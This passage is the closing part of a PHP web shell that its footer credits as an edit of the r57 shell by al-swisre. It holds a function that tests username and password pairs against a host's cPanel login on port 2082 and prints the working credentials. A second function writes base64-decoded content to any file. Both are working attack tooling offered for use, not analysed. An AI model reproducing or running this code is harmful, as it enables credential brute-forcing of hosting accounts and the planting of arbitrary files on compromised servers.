3826. exit;}
3827.  
3828.  
3829. function cpanel_check($host,$user,$pass,$timeout){
3830. $ch = curl_init();
3831. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
3832. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3833. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
3834. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
3835. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
3836. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
3837. $data = curl_exec($ch);
3838. if ( curl_errno($ch) == 28 ) {
3839. print "<b> Error : Connection timed out</b>";
3840. exit;}
3841. elseif ( curl_errno($ch) == 0 ){
3842.  
3843. print
3844. "
3845. <b>found username : <font color='#FF0000'>$user</font> - password :
3846. <font color='#FF0000'>$pass </font></b><br>"; }curl_close($ch);
3847. exit; }
3848.  
3849.  
3850. function op_sa($f,$t) {
3851. $w = @fopen($f,"w") or @function_exists('file_put_contents');
3852. if($w){
3853. @fwrite($w,@base64_decode($t));
3854. @fclose($w);
3855. }
3856. }
3857.  
3858.  
3859. echo "</td></tr></table></div> |<b class='foter'>Progr4m3r by <a href='$pg?sws=ab'>al-swisre Edited: r57.gen.tr</a></b>|<b class='foter'>E-m4il : <a href='#'>oy3@hotmail.com</a></b>|<b class='foter'>r57 shell : <a target='_blank' href='http://r57.gen.tr'>r57 shell</a></b>| </html> ";
3860.  
3861.  
3862.  
3863. ?>